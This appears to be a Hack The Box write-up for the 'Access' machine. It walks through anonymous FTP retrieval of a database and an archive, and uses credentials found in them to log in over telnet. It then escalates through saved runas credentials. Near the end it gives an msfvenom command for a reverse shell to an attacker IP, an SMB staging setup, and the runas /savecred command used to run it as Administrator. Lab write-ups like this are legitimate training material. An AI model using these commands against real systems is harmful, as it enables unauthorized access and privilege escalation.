Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Per the usual, we’ll start with our standard nMap scan: nmap -A -p – 10.10.10.98
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-64-1024x573.png)
So port 80 is open, let’s check out the webpage:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-65-1024x496.png)
Nothing too exciting. I also see that port 21 is open with Anonymous FTP login, so let’s try that: ftp 10.10.10.98
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-66.png)
Navigating to the Backups directory, there is a backup.mdb file, so let’s get that: get backup.mdb
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-67.png)
There is also a Access Control.zip file in the Engineer directory, so let’s get that too: get “Access Control.zip”
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-68.png)
And then we notice something interesting when we transfer the files. They both present a WARNING! error that the files were received in ASCII mode. This could be problematic (and was) when I tried to open the files because they displayed as corrupted. We can type binary in our FTP window to switch our transfer mode to binary.
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-69.png)
It looks like .mdb is a Microsoft Access database. I ran the command apt search mdb to see what packages I could potentially install that might let me view a mdb file and saw mdbtools, so I installed that with apt-get install mdbtools.
Now, when we do mdb-tables backup.mdb we can see the tables within this database:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-70.png)
I’m gonna go an easy route right now and use the website www.mdbopener.com. Obviously if this was a potentially sensitive database we wouldn’t want to do this. However, since this is HTB, I’m ok with it. When we open our database we see a bunch of information in a much easier to view format:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-71-1024x699.png)
When we look at the auth user table, we can see three entries:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-72-1024x156.png)
Cool! I also know that when I tried to open up the .zip file downloaded earlier it’s password protected. Let’s try some of these credentials:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-73.png)
The GUI extractor was being dumb so I tried the command line one: 7z x “Access Control.zip” and entered access4u@security as the password.
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-74.png)
And we’re presented with a .pst file, which is an Outlook e-mail archive/profile. I had to install pst-utils first with apt-get install pst-utils After installation, I was able to run the command readpst ‘Access Controls.pst’ and was presented with the mailbox itself.
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-75.png)
We can then use cat to view the contents of the mailbox, and we’re presnted with a username and a password:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-76.png)
Shell
We can use Telnet to get into the box easily enough:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-77.png)
Once on the machine I ran systeminfo and saved the associated data in a new file on my Kali box:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-93.png)
From here, we’ll use Windows Exploit Suggester to see if there’s any vulnerabilities that stand out. First I’ll navigate to where I have WES saved and then we’ll update the database: ./windows-exploit-suggester.py –update
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-94-1024x94.png)
Next, we’ll compare this newly updated database with the systeminfo file from our target machine: ./windows-exploit-suggester.py –database 2020-08-25-mssb.xls –systeminfo ../../Access/systeminfo.txt
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-95-1024x386.png)
Looking at these, there are some critical vulnerabilities but nothing for remote code execution, priv esc, etc. So let’s move forward.
After moving to C:\Users\Public\Desktop there is a .lnk file stored here. So let’s type it:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-96-1024x170.png)
There are two commands in here worth investigating: runas and savecred:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-97-1024x168.png)
RunAs allows a user to run a command as another user, and /savecred saves the password so that it only has to be entered the first time RunAs is used. From dummies.com:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-98.png)
Now, we could use RunAs to view the root flag, but that’s no fun. Let’s create a reverse shell. Let’s use msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe > shell.exe
If you need a refresher or a cheat sheet, I found this handy one: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-99.png)
Next, we need to get our shell.exe over to our target machine. To do this we’ll setup our Impacket SMBServer: impacket-smbserver smb smb (don’t forget to be in the directory above the directory you want to share.
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-100.png)
Next, from our Telnet/Shell we want to add this SMB share as an accessible location from our Windows box: net use \\10.10.14.8\smb
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-101.png)
Now let’s copy over our shell: copy \\10.10.14.8\smb\shell.exe
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-102.png)
Access Denied….which means I can’t write to the directory I’m in. So let’s move to C:\temp and try again:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-103.png)
Now we can use our RunAs command in conjunction with savecred: runas /user:Access\Administrator /savecred “C:\temp\shell.exe” But first we need to start our NetCat listener to catch our reverse shell:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-104.png)
And then run our command:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-105.png)
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-106.png)